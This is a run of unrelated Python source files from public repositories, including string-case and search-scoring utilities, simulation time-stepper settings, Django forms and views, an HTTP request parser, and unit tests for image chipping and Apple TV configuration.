The elif compares i with count (which holds i + 1 from the last space), so the first letter of each word is emitted in upper case via upper(),\n# and the else emits the remaining letters in lower case.\n\nimport pytest\ndef solution(s):\n answer, count = '', 0\n for i in range(len(s)):\n if s[i] == ' ':\n answer += s[i]\n count = i + 1\n elif i == count:\n answer += s[i].upper()\n else:\n answer += s[i].lower()\n return answer\n\ndef test_solution():\n assert solution(\"3people unFollowed me\") == \"3people Unfollowed Me\"\n assert solution(\"for the last week\") == \"For The Last Week\"\n","repo_name":"dueytree/Algorithm_test","sub_path":"jadencase.py","file_name":"jadencase.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20760025212","text":"#!/usr/bin/python\n\n# Import standard modules\nimport math\n\n#======================================================================#\n# Program Description:\n# Responsible for the search computations in search.py\n# Contains methods for tf-idf weight computation and vector normalization.\n#======================================================================#\nclass Search_Compute:\n len_docIDs = 0\n list_doc_length_IPC = {}\n \n def __init__(self, list_of_docID_len, list_doc_length_IPC):\n self.len_docIDs = list_of_docID_len\n self.list_doc_length_IPC = list_doc_length_IPC\n \n def get_docID_length(self, docID):\n return self.list_doc_length_IPC[docID][0]\n\n def get_docID_IPC(self, docID):\n return self.list_doc_length_IPC[docID][1]\n \n #==================================================================#\n # Computation methods\n #==================================================================#\n \n \"\"\"\n Computes the weighted tf-idf score for a docID given in a specific postings list.\n \n zone_type \"title\", \"abstr\" section specifiers for the document.\n term_postings Postings list of a query term\n query_term_weight Query term score\n scores Mapping of { docID : current score }\n \n return New updated mapping of scores for { docID : score }\n \"\"\"\n def compute_weighted_score(self, zone_type, term_postings, query_term_weight, scores):\n # All element values should sum to 1.0 (\"abstr\" represents \"abstract\")\n zone_weights = { \"title\" : 0.7, \"abstr\" : 0.3 }\n \n # Term will be ignored if it does not exist in the dictionary in all zones (postings are empty)\n if term_postings[zone_type] is not None:\n for docID_termFreq_pair in term_postings[zone_type]:\n curr_docID = docID_termFreq_pair[0]\n term_freq = docID_termFreq_pair[1]\n \n # Document score weighted against its zone type\n doc_term_weight = self.get_log_tf_weight(term_freq) * zone_weights[zone_type]\n \n # Dot product of query and doc term weights\n if not scores.has_key(curr_docID):\n scores[curr_docID] = 0\n scores[curr_docID] += query_term_weight * doc_term_weight\n return scores\n\n \n \"\"\"\n Computes the term frequency log weights of each query term in the input.\n Will compute for duplicated query terms only once.\n \n Precondition: \n All query terms passed in must already be normalized.\n Duplicate query terms must not be filtered from the list of query terms.\n \n Arguments:\n old_normalized_list List of query terms performed at the first search operation\n new_normalized_list List of query terms performed at the query expansion\n Specify None if only doing the first search operation\n \n return A mapping of term frequencies for each query term\n \"\"\"\n def compute_query_tf_weight(self, old_normalized_list, new_normalized_list):\n query_term_freq_map = {}\n 
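# work on a copy of the old query terms so the caller's list is never mutated\n 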
combined_list = list(old_normalized_list)\n \n if not new_normalized_list is None: # Checks if we are doing query expansion now\n combined_list.extend(new_normalized_list)\n for query_term in new_normalized_list:\n if not query_term in old_normalized_list:\n # This is a completely new query term due to Query Expansion\n if not query_term_freq_map.has_key(query_term): # Checks for duplicate keys\n query_term_freq_map[query_term] = \\\n self.get_log_tf_weight(combined_list.count(query_term)) * 0.5\n \n for query_term in old_normalized_list:\n if not query_term_freq_map.has_key(query_term): # Checks for duplicate keys\n if not (new_normalized_list is None) and (query_term in new_normalized_list):\n # If the term is also in the new query list, it is \"more important\"\n weight = 2.0\n else:\n # If the term was in the original old query list and is not new\n weight = 1.0\n query_term_freq_map[query_term] = \\\n self.get_log_tf_weight(combined_list.count(query_term)) * weight\n \n return query_term_freq_map\n \n \"\"\"\n Computes the idf of a query term.\n \n query_term Query term in String format\n term_postings Query term's postings across all zone types\n \n return Inverse doc frequency of a query term.\n \"\"\"\n def get_idf(self, query_term, term_postings):\n doc_freq = 0\n \n # Make a big postings list joining each zone-specific postings for query idf computation\n term_postings_all = self.combine_list(term_postings[\"title\"], term_postings[\"abstr\"])\n \n if term_postings_all is not None:\n combined_term_postings = \\\n set([docID_termFreq_pair[0] for docID_termFreq_pair in term_postings_all])\n doc_freq = len(combined_term_postings)\n if doc_freq == 0:\n # query term does not occur in ANY doc and should not have weight\n return 0\n else:\n return math.log(float(self.len_docIDs) / doc_freq, 10)\n \n \"\"\"\n Computes the logarithmic frequency weight of a term.\n \n term_freq Term frequency in a document.\n \n return Log term frequency weight.\n \"\"\"\n def get_log_tf_weight(self, term_freq):\n if term_freq == 0:\n return 0;\n else:\n return 1 + math.log(term_freq, 10)\n \n \"\"\"\n Computes the normalization of tf-idf scores for all result docIDs.\n \n scores Mapping of { docID : score }\n list_of_query_idf List of idf values for the query vectors\n \n return New updated mapping of { docID : score } normalized\n \"\"\"\n def normalize_scores(self, scores, list_of_query_idf):\n query_norm = self.get_query_unit_magnitude(list_of_query_idf)\n for docID in scores.keys():\n # Doc length can be obtained from the pickle object loaded from disk\n if not (self.get_docID_length(docID) == 0):\n norm_magnitude = query_norm * self.get_docID_length(docID)\n scores[docID] = (scores[docID] / norm_magnitude)\n return scores\n \n \"\"\"\n Computes the magnitude of the query vector for normalization.\n \n list_of_query_idf List of query term idf values.\n \n return Magnitude of the query vector.\n \"\"\"\n def get_query_unit_magnitude(self, list_of_query_idf):\n query_norm = 1;\n for idf_value in list_of_query_idf:\n if not idf_value == 0:\n query_norm *= math.pow(idf_value, 2)\n return math.sqrt(query_norm)\n \n #======================================================================#\n # Auxillary helper functions:\n #======================================================================#\n \n \"\"\"\n Combines a copy of the contents of a list and appends a copy of the contents \n of the operand list to it.\n \n list1 Base\n list2 List to append to list1\n \n return Combined list of list1 and list2\n 
\"\"\" \n def combine_list(self, list1, list2):\n if list2 is not None:\n combined = list(list1)\n combined.extend(list2)\n return combined\n else:\n return list1\n","repo_name":"NatashaKSS/info-retrieval-of-patent-docs","sub_path":"search_computation.py","file_name":"search_computation.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12047268604","text":"with open('input.txt') as f:\n inputs = f.read()\n\ncounter = 0\nfor line in inputs.splitlines():\n encoding, sequence = line.split(': ')\n limits, character = encoding.split(' ')\n low, high = limits.split(\"-\")\n appearances = sequence.count(character)\n counter += int(int(low) <= appearances <= int(high))\nprint(counter)","repo_name":"UtnansN/Advent-Of-Code-20","sub_path":"day2/day2-a.py","file_name":"day2-a.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22736572652","text":"#\n# TimeStepper settings object\n# #################################\n\nimport numpy as np\n\nfrom .. DREAMException import DREAMException\nfrom . ToleranceSettings import ToleranceSettings\n\n\nTYPE_CONSTANT = 1\nTYPE_ADAPTIVE = 2\nTYPE_IONIZATION = 3\n\n\nclass TimeStepper:\n \n def __init__(self, ttype=1, checkevery=0, tmax=None, dt=None, nt=None, nSaveSteps=0, reltol=1e-2, verbose=False, constantstep=False):\n \"\"\"\n Constructor.\n \"\"\"\n self.set(ttype=ttype, checkevery=checkevery, tmax=tmax, dt=dt, nt=nt, nSaveSteps=nSaveSteps, reltol=reltol, verbose=verbose, constantstep=constantstep)\n \n\n def set(self, ttype=1, checkevery=0, tmax=None, dt=None, nt=None, nSaveSteps=0, reltol=1e-2, verbose=False, constantstep=False, minsavedt=0):\n \"\"\"\n Set properties of the time stepper.\n \"\"\"\n self.type = int(ttype)\n\n self.setCheckInterval(checkevery)\n self.setTmax(tmax)\n self.setDt(dt)\n self.setNt(nt)\n self.setMinSaveTimestep(minsavedt)\n self.setNumberOfSaveSteps(nSaveSteps)\n self.setVerbose(verbose)\n self.setConstantStep(constantstep) \n self.tolerance = ToleranceSettings()\n self.tolerance.set(reltol=reltol)\n \n self.dtmax = None\n self.automaticstep = None\n self.safetyfactor = None\n\n\n def __contains__(self, item):\n return (item in self.todict(False))\n\n\n def __getitem__(self, key):\n return self.todict(False)[key]\n\n\n ######################\n # SETTERS\n ######################\n def setCheckInterval(self, checkevery):\n if checkevery < 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'checkevery': {}\".format(checkevery))\n \n self.checkevery = int(checkevery)\n\n\n def setConstantStep(self, constantstep):\n self.constantstep = bool(constantstep)\n\n\n def setDt(self, dt):\n if dt is None:\n self.dt = None\n return\n\n if dt < 0 or (dt == 0 and self.type != TYPE_IONIZATION):\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'dt': {}\".format(dt))\n if self.nt is not None and dt > 0:\n raise DREAMException(\"TimeStepper: 'dt' may not be set alongside 'nt'.\")\n \n self.dt = float(dt)\n\n\n def setMinSaveTimestep(self, dt):\n \"\"\"\n For the adaptive ionization-based time stepper, sets the minimum\n time which must elapse between two saved time steps.\n \"\"\"\n self.minsavedt = dt\n\n\n def setNt(self, nt):\n if nt is None:\n self.nt = None\n return\n\n if nt <= 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'nt': {}\".format(nt))\n if self.dt is not None and self.dt > 
0:\n raise DREAMException(\"TimeStepper: 'nt' may not be set alongside 'dt'.\")\n \n self.nt = int(nt)\n\n\n def setNumberOfSaveSteps(self, nSaveSteps):\n \"\"\"\n Sets the number of time steps to save to the output file.\n This number must be <= Nt. If 0, all time steps are saved.\n \"\"\"\n self.nSaveSteps = nSaveSteps\n\n\n def setRelTol(self, reltol): self.setRelativeTolerance(reltol=reltol)\n\n\n def setRelativeTolerance(self, reltol):\n if reltol <= 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'reltol': {}\".format(reltol))\n\n self.tolerance.set(reltol=float(reltol))\n\n\n def setTmax(self, tmax):\n if tmax is None:\n self.tmax = None\n return\n\n if tmax <= 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'tmax': {}\".format(tmax))\n\n self.tmax = float(tmax)\n\n\n def setType(self, ttype, *args, **kwargs):\n if ttype not in [TYPE_CONSTANT, TYPE_ADAPTIVE, TYPE_IONIZATION]:\n raise DREAMException(\"TimeStepper: Unrecognized time stepper type specified: {}\".format(ttype))\n\n if ttype in [TYPE_ADAPTIVE, TYPE_IONIZATION]:\n self.nt = None\n\n self.type = int(ttype)\n \n if ttype == TYPE_IONIZATION:\n self.setIonization(*args, **kwargs)\n \n\n def setIonization(self, dt0=0, dtmax=0, tmax=None, automaticstep=1e-12, safetyfactor=50):\n \"\"\"\n Select and set parameters for the ionization time stepper.\n \"\"\"\n self.type = TYPE_IONIZATION\n self.dt = dt0\n self.dtmax = dtmax\n self.automaticstep = automaticstep\n self.safetyfactor = safetyfactor\n\n if tmax is not None:\n self.tmax = tmax\n\n\n def setVerbose(self, verbose=True):\n self.verbose = bool(verbose)\n\n\n def fromdict(self, data):\n \"\"\"\n Load settings from the given dictionary.\n \"\"\"\n def scal(v):\n if type(v) == np.ndarray: return v[0]\n else: return v\n\n self.type = data['type']\n self.tmax = data['tmax']\n\n if type(self.type) == np.ndarray: self.type = int(self.type.flatten()[0])\n if type(self.tmax) == np.ndarray: self.tmax = float(self.tmax.flatten()[0])\n\n if 'automaticstep' in data: self.automaticstep = float(scal(data['automaticstep']))\n if 'checkevery' in data: self.checkevery = int(scal(data['checkevery']))\n if 'constantstep' in data: self.constantstep = bool(scal(data['constantstep']))\n if 'dt' in data: self.dt = float(scal(data['dt']))\n if 'dtmax' in data: self.dtmax = float(scal(data['dtmax']))\n if 'minsavedt' in data: self.minsavedt = float(scal(data['minsavedt']))\n if 'nt' in data: self.nt = int(scal(data['nt']))\n if 'nsavesteps' in data: self.nSaveSteps = int(scal(data['nsavesteps']))\n if 'verbose' in data: self.verbose = bool(scal(data['verbose']))\n if 'safetyfactor' in data: self.safetyfactor = float(scal(data['safetyfactor']))\n if 'tolerance' in data: self.tolerance.fromdict(data['tolerance'])\n \n self.verifySettings()\n\n\n def todict(self, verify=True):\n \"\"\"\n Returns a Python dictionary containing all settings of\n this TimeStepper object.\n \"\"\"\n if verify:\n self.verifySettings()\n\n data = {\n 'type': self.type,\n 'tmax': self.tmax\n }\n\n if self.dt is not None: data['dt'] = self.dt\n\n if self.type == TYPE_CONSTANT:\n if self.nt is not None: data['nt'] = self.nt\n data['nsavesteps'] = int(self.nSaveSteps)\n elif self.type == TYPE_ADAPTIVE:\n data['checkevery'] = self.checkevery\n data['constantstep'] = self.constantstep\n data['tolerance'] = self.tolerance.todict()\n data['verbose'] = self.verbose\n elif self.type == TYPE_IONIZATION:\n if self.dtmax is not None: data['dtmax'] = self.dtmax\n data['automaticstep'] = 
self.automaticstep\n data['safetyfactor'] = self.safetyfactor\n data['minsavedt'] = self.minsavedt\n\n return data\n\n\n def verifySettings(self):\n \"\"\"\n Verify that the TimeStepper settings are consistent.\n \"\"\"\n if self.type == TYPE_CONSTANT:\n if self.tmax is None or self.tmax <= 0:\n raise DREAMException(\"TimeStepper constant: 'tmax' must be set to a value > 0.\")\n \n # Verify that _exactly_ one of 'dt' and 'nt' is\n # set to a valid value\n dtSet = (self.dt is not None and self.dt > 0)\n ntSet = (self.nt is not None and self.nt > 0)\n\n if dtSet and ntSet:\n raise DREAMException(\"TimeStepper constant: Exactly one of 'dt' and 'nt' must be > 0.\")\n\n if self.nSaveSteps < 0 or (ntSet and self.nSaveSteps > self.nt):\n raise DREAMException(\"TimeStepper constant: Invalid value assigned to 'nSaveSteps'. Must between 0 and nt.\")\n elif self.type == TYPE_ADAPTIVE:\n if self.tmax is None or self.tmax <= 0:\n raise DREAMException(\"TimeStepper adaptive: 'tmax' must be set to a value > 0.\")\n elif self.nt is not None:\n raise DREAMException(\"TimeStepper adaptive: 'nt' cannot be used with the adaptive time stepper.\")\n\n if type(self.checkevery) != int or self.checkevery < 0:\n raise DREAMException(\"TimeStepper adaptive: 'checkevery' must be a non-negative integer.\")\n elif type(self.verbose) != bool:\n raise DREAMException(\"TimeStepper adaptive: 'verbose' must be a boolean.\")\n elif type(self.constantstep) != bool:\n raise DREAMException(\"TimeStepper adaptive: 'constantstep' must be a boolean.\")\n self.tolerance.verifySettings()\n elif self.type == TYPE_IONIZATION:\n if self.tmax is None or self.tmax <= 0:\n raise DREAMException(\"TimeStepper ionization: 'tmax' must be set to a value > 0.\")\n elif self.dt is None or self.dt < 0:\n raise DREAMException(\"TimeStepper ionization: 'dt' must be set to a non-negative value.\")\n elif self.dtmax is None or self.dtmax < 0:\n raise DREAMException(\"TimeStepper ionization: 'dtmax' must be set to a non-negative value.\")\n elif self.minsavedt < 0:\n raise DREAMException(\"TimeStepper ionization: 'minsavedt' must be non-negative.\")\n else:\n raise DREAMException(\"Unrecognized time stepper type selected: {}.\".format(self.type))\n\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Settings/TimeStepper.py","file_name":"TimeStepper.py","file_ext":"py","file_size_in_byte":9499,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"42057451985","text":"# coding: utf-8\n\nfrom django import forms\n\nfrom employees.models import Employee\n\n# Create your forms here.\n\nPROJECT_STATUS = (\n ('Any', 'Any'),\n ('Not started', 'Not started'),\n ('In development', 'In development'),\n ('Finished', 'Finished'),\n)\n\nYEARS = (\n ('2004', '2004'),\n ('2005', '2005'),\n ('2006', '2006'),\n ('2007', '2007'),\n ('2008', '2008'),\n ('2009', '2009'),\n ('2010', '2010'),\n ('2011', '2011'),\n ('2012', '2012'),\n ('2013', '2013'),\n ('2014', '2014'),\n ('2015', '2015'),\n ('2016', '2016'),\n ('2017', '2017'),\n ('2018', '2018'),\n ('2019', '2019'),\n)\n\nGEOGRAPHICAL_SCOPE = (\n ('All', 'All'),\n ('Araba', 'Araba'),\n ('Bizkaia', 'Bizkaia'),\n ('Gipuzkoa', 'Gipuzkoa'),\n ('Euskadi', 'Euskadi'),\n ('Spain', 'Spain'),\n ('Europe', 'Europe'),\n ('International', 'International'),\n)\n\nAND_OR = (\n ('AND', 'AND'),\n ('OR', 'OR'),\n)\n\n\n#########################\n# Class: SemanticSearchForm\n#########################\n\nclass SemanticSearchForm(forms.Form):\n title = 
forms.CharField(max_length = 150, required = False)\n status = forms.ChoiceField(choices = PROJECT_STATUS, initial = \"Any\", required = False)\n scope = forms.ChoiceField(choices = GEOGRAPHICAL_SCOPE, initial = \"All\", required = False)\n start_year = forms.ChoiceField(choices = YEARS, initial = 2004, required = False)\n end_year = forms.ChoiceField(choices = YEARS, initial = 2013, required = False)\n researchers = forms.ModelMultipleChoiceField(queryset = Employee.objects.all(), required = False)\n and_or = forms.ChoiceField(widget = forms.RadioSelect(), choices = AND_OR, required = False)\n","repo_name":"OscarPDR/projects_morelab","sub_path":"semantic_search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26097942913","text":"import unittest\nfrom resippy.test_runner import demo_data_base_dir\nfrom resippy.utils import file_utils as file_utils\nfrom resippy.utils.image_utils import image_chipper\nfrom resippy.utils.image_utils import image_utils\nfrom imageio import imread\nimport numpy as np\nimport random\n\n\nclass TestChipper(unittest.TestCase):\n print(\"TEST CHIPPER TESTS\")\n\n def setUp(self):\n print(\"\")\n self.png_fullpath = file_utils.get_path_from_subdirs(demo_data_base_dir,\n [\"image_data\",\n \"overhead_vehicle_data\",\n \"Potsdam_ISPRS\",\n \"top_potsdam_2_14_RGB.png\"])\n self.png_image_data = imread(self.png_fullpath)\n png_shape = self.png_image_data.shape\n self.ny = png_shape[0]\n self.nx = png_shape[1]\n self.nbands = png_shape[2]\n\n def test_overlap(self):\n print(\"\")\n chip_size = 256\n npix_overlap = 128\n rgb_chips, rgb_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n bands=[0, 1, 2],\n chip_nx_pixels=chip_size,\n chip_ny_pixels=chip_size)\n rgb_y_overlap_chips, rgb_y_overlap_chip_indices = image_chipper.\\\n chip_entire_image_to_memory(self.png_image_data,\n npix_overlap_y=npix_overlap,\n chip_nx_pixels=chip_size,\n chip_ny_pixels=chip_size,\n bands=[0, 1, 2])\n n_rgb_chips = len(rgb_chips)\n n_rgb_w_overlap = len(rgb_y_overlap_chip_indices)\n ny, nx, nbands = image_utils.get_image_ny_nx_nbands(self.png_image_data)\n\n assert np.ceil(ny/chip_size) * np.ceil(nx/chip_size) == n_rgb_chips\n assert np.ceil((ny/chip_size) * 2 - 1) * np.ceil(nx/chip_size) == n_rgb_w_overlap\n print(\"overlap is working as expected\")\n print(\"OVERLAP TEST PASSED\")\n\n def test_bands(self):\n print(\"\")\n rgb_bands_list = [0, 1, 2]\n full_chips, full_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data)\n rgb_chips, rgb_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n bands=rgb_bands_list)\n n_chips_full = full_chips.shape[0]\n n_chips_rgb = rgb_chips.shape[0]\n assert n_chips_full == n_chips_rgb\n print(\"number of full chips and number of grayscale chips match\")\n\n for i in range(n_chips_full):\n full_chip = full_chips[i]\n rgb_chip = rgb_chips[i]\n assert(full_chip[:, :, rgb_bands_list] == rgb_chip).all()\n print(\"full chips using bands subset list matches rgb chips\")\n print(\"TEST BANDS TEST PASSED\")\n\n def test_grayscale(self):\n print(\"\")\n band_num = 0\n full_chips, full_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data)\n grayscale_chips, grayscale_chip_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n bands=band_num)\n\n n_chips_full = full_chips.shape[0]\n n_chips_grayscale = 
grayscale_chips.shape[0]\n assert n_chips_full == n_chips_grayscale\n print(\"test chipper - number of full chips and number of grayscale chips match\")\n\n for i in range(n_chips_full):\n full_chip = full_chips[i]\n grayscale_chip = grayscale_chips[i]\n assert grayscale_chip.shape != full_chip.shape\n assert (full_chip[:, :, band_num] == grayscale_chip).all()\n print(\"test chipper - grayscale test passed\")\n\n def test_lower_right(self):\n print(\"\")\n chip_nx_pixels = 217\n chip_ny_pixels = 217\n full_chips, full_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n chip_ny_pixels=chip_ny_pixels,\n chip_nx_pixels=chip_nx_pixels)\n lower_right_image = self.png_image_data[(self.ny-chip_ny_pixels):, (self.nx-chip_nx_pixels):, :]\n assert (full_chips[-1] == lower_right_image).any()\n print(\"last chip matches the lower corner of the original image.\")\n print(\"LOWER RIGHT TEST PASSED\")\n\n def test_keep_within_bounds(self):\n print(\"\")\n ul_y = [self.ny - 10, -10]\n ul_x = [self.nx - 10, -10]\n chip_ny_pixels = 217\n chip_nx_pixels = 217\n chips, ul_indices = image_chipper.chip_images_by_pixel_upper_lefts(self.png_image_data, ul_y, ul_x,\n chip_ny_pixels=chip_ny_pixels,\n chip_nx_pixels=chip_nx_pixels)\n lower_right_image = self.png_image_data[(self.ny - chip_ny_pixels):, (self.nx - chip_nx_pixels):, :]\n assert(chips[0] == lower_right_image).all()\n\n upper_left_image = self.png_image_data[0:chip_ny_pixels, 0:chip_nx_pixels]\n assert(chips[1] == upper_left_image).all()\n\n print(\"chipping out within image bounds\")\n print(\"\")\n\n def test_chip_by_centers(self):\n n_samples = 20\n chip_size = 256\n y_uls = random.sample(list(np.arange(0, self.ny)), n_samples)\n x_uls = random.sample(list(np.arange(0, self.nx)), n_samples)\n\n x_centers = np.add(x_uls, chip_size/2).astype(int)\n y_centers = np.add(y_uls, chip_size/2).astype(int)\n\n chips_by_ul, indices_by_ul = image_chipper.chip_images_by_pixel_upper_lefts(\n self.png_image_data, pixel_y_ul_list=y_uls, pixel_x_ul_list=x_uls,\n chip_nx_pixels=chip_size, chip_ny_pixels=chip_size)\n\n chips_by_centers, indices_by_ul = image_chipper.chip_images_by_pixel_centers(\n self.png_image_data, pixel_y_center_list=y_centers, pixel_x_center_list=x_centers,\n chip_nx_pixels=chip_size, chip_ny_pixels=chip_size)\n\n assert(chips_by_ul == chips_by_centers).all()\n print(\"chipping by centers matches chipping by ul\")\n print(\"\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BeamIO-Inc/resippy","sub_path":"tests/demo_tests/test_chipper.py","file_name":"test_chipper.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"19487386166","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\n\ndef index(request):\n ''' Default form '''\n if request.method == \"GET\":\n return render(request, 'ai/sa.html',\n {'source': '', 'result': '?'})\n if request.method == \"POST\":\n r = requests.post(\"http://127.0.0.1:5000/api/imdb_sa_s/hello\", json=request.POST['q'])\n result = r.text\n res = result.split(';')\n pred = res[0]\n prob = res[1]\n\n answer_pred = ''\n if pred == '1':\n answer_pred = '+'\n else:\n answer_pred = '-'\n\n return render(request, 'ai/sa.html',\n {'source': request.POST['q'], 'result': answer_pred + \" (\" + prob + 
\")\"})","repo_name":"polyakovyevgeniy/portfolio_ai","sub_path":"jango_web_site/ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29417246789","text":"from albatross.data_types import (\n ImmutableMultiDict,\n ImmutableCaselessMultiDict\n)\nfrom albatross.compat import json\nimport urllib.parse as parse\nfrom httptools import parse_url\nimport cgi\nimport io\n\n\nREQUEST_STATE_PROCESSING = 0\nREQUEST_STATE_CONTINUE = 1\nREQUEST_STATE_COMPLETE = 2\n\n\ndef trim_keys(d):\n return {k.strip(): v for k, v in d.items()}\n\n\nclass FileStorage:\n\n def __init__(self, field_storage):\n self.filename = field_storage.filename\n self.value = field_storage.value\n\n\nclass Request:\n \"\"\"\n Attributes:\n method (str): One of GET, POST, PUT, DELETE\n path (str): Full request path\n query_string (str): Full query string\n query (dict): dict of the request query\n body (str): Request body\n args (dict): Dictionary of named parameters in route regex\n form (dict): Dictionary of body parameters\n \"\"\"\n\n def __init__(self, method=None, path=None, query_string='',\n args=None, headers=None, form=None, cookies=None):\n self._header_list = []\n self._state = REQUEST_STATE_PROCESSING\n self.method = method\n self.path = path\n self.query_string = query_string\n self.query = None\n self.args = args\n self.headers = ImmutableCaselessMultiDict()\n self.cookies = ImmutableMultiDict()\n self.raw_body = io.BytesIO()\n self.form = form\n\n if query_string:\n self.query = ImmutableMultiDict(parse.parse_qs(self.query_string))\n\n if headers:\n self.headers = ImmutableCaselessMultiDict(**headers)\n\n if cookies:\n self.cookies = ImmutableMultiDict(**cookies)\n\n def _parse_cookie(self, value):\n cookies = trim_keys(parse.parse_qs(value))\n return ImmutableMultiDict(cookies)\n\n def _parse_form(self, body_stream):\n # TODO theres probably a way to not read whole body first)\n env = {'REQUEST_METHOD': 'POST'}\n form = cgi.FieldStorage(body_stream, headers=self.headers, environ=env)\n d = {}\n for k in form.keys():\n if form[k].filename:\n d[k] = [FileStorage(form[k])]\n else:\n d[k] = [form[k].value]\n return ImmutableMultiDict(d)\n\n def _parse_body(self, body_stream):\n content_type = self.headers.get('Content-Type', '')\n if content_type == 'application/json':\n data = body_stream.getvalue().decode()\n self.form = json.loads(data)\n elif content_type.startswith('multipart/form-data'):\n self.form = self._parse_form(body_stream)\n elif content_type == 'application/x-www-form-urlencoded':\n data = body_stream.getvalue().decode()\n self.form = ImmutableMultiDict(parse.parse_qs(data))\n body_stream.seek(0)\n\n # HTTPRequestParser protocol methods\n def on_url(self, url: bytes):\n parsed = parse_url(url)\n self.path = parsed.path.decode()\n self.query_string = (parsed.query or b'').decode()\n self.query = ImmutableMultiDict(parse.parse_qs(self.query_string))\n\n def on_header(self, name: bytes, value: bytes):\n self._header_list.append((name.decode(), value.decode()))\n if name.lower() == b'expect' and value == b'100-continue':\n self._state = REQUEST_STATE_CONTINUE\n\n def on_headers_complete(self):\n self.headers = ImmutableCaselessMultiDict(self._header_list)\n cookie_value = self.headers.get('Cookie')\n if cookie_value:\n self.cookies = self._parse_cookie(cookie_value)\n\n def on_body(self, body: bytes):\n self.raw_body.write(body)\n\n def on_message_complete(self):\n self._state 
= REQUEST_STATE_COMPLETE\n self.raw_body.seek(0)\n self._parse_body(self.raw_body)\n\n @property\n def finished(self):\n return self._state == REQUEST_STATE_COMPLETE\n\n @property\n def needs_write_continue(self):\n return self._state == REQUEST_STATE_CONTINUE\n\n def reset_state(self):\n self._state = REQUEST_STATE_PROCESSING\n","repo_name":"kespindler/albatross","sub_path":"albatross/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"53"} +{"seq_id":"1579467058","text":"\"\"\"Unit tests for pyatv.conf.\"\"\"\n\nimport unittest\n\nfrom pyatv import conf, exceptions\nfrom pyatv.const import Protocol, OperatingSystem, DeviceModel\n\nADDRESS_1 = \"127.0.0.1\"\nADDRESS_2 = \"192.168.0.1\"\nNAME = \"Alice\"\nPORT_1 = 1234\nPORT_2 = 5678\nIDENTIFIER_1 = \"id1\"\nIDENTIFIER_2 = \"id2\"\nIDENTIFIER_3 = \"id3\"\nCREDENTIALS_1 = \"cred1\"\n\nMRP_PROPERTIES = {\n \"SystemBuildVersion\": \"17K795\",\n \"macAddress\": \"ff:ee:dd:cc:bb:aa\",\n}\n\nAIRPLAY_PROPERTIES = {\n \"model\": \"AppleTV6,2\",\n \"deviceid\": \"aa:bb:cc:dd:ee:ff\",\n \"osvers\": \"8.0.0\",\n}\n\n\nclass ConfTest(unittest.TestCase):\n def setUp(self):\n self.config = conf.AppleTV(ADDRESS_1, NAME)\n self.dmap_service = conf.DmapService(IDENTIFIER_1, None, port=PORT_1)\n self.mrp_service = conf.MrpService(\n IDENTIFIER_2, PORT_2, properties=MRP_PROPERTIES\n )\n self.airplay_service = conf.AirPlayService(\n IDENTIFIER_3, PORT_1, properties=AIRPLAY_PROPERTIES\n )\n\n def test_address_and_name(self):\n self.assertEqual(self.config.address, ADDRESS_1)\n self.assertEqual(self.config.name, NAME)\n\n def test_equality(self):\n self.assertEqual(self.config, self.config)\n\n atv2 = conf.AppleTV(ADDRESS_1, NAME)\n atv2.add_service(conf.AirPlayService(IDENTIFIER_1, PORT_1))\n self.assertNotEqual(self.config, atv2)\n\n def test_add_services_and_get(self):\n self.config.add_service(self.dmap_service)\n self.config.add_service(self.mrp_service)\n self.config.add_service(self.airplay_service)\n\n services = self.config.services\n self.assertEqual(len(services), 3)\n\n self.assertIn(self.dmap_service, services)\n self.assertIn(self.mrp_service, services)\n self.assertIn(self.airplay_service, services)\n\n self.assertEqual(self.config.get_service(Protocol.DMAP), self.dmap_service)\n self.assertEqual(self.config.get_service(Protocol.MRP), self.mrp_service)\n self.assertEqual(\n self.config.get_service(Protocol.AirPlay), self.airplay_service\n )\n\n def test_identifier_order(self):\n self.assertIsNone(self.config.identifier)\n\n self.config.add_service(self.dmap_service)\n self.assertEqual(self.config.identifier, IDENTIFIER_1)\n\n self.config.add_service(self.mrp_service)\n self.assertEqual(self.config.identifier, IDENTIFIER_2)\n\n self.config.add_service(self.airplay_service)\n self.assertEqual(self.config.identifier, IDENTIFIER_2)\n\n def test_add_airplay_service(self):\n self.config.add_service(self.airplay_service)\n\n airplay = self.config.get_service(Protocol.AirPlay)\n self.assertEqual(airplay.protocol, Protocol.AirPlay)\n self.assertEqual(airplay.port, PORT_1)\n\n def test_main_service_no_service(self):\n with self.assertRaises(exceptions.NoServiceError):\n self.config.main_service()\n\n def test_main_service_airplay_no_service(self):\n self.config.add_service(self.airplay_service)\n with self.assertRaises(exceptions.NoServiceError):\n self.config.main_service()\n\n def test_main_service_get_service(self):\n 
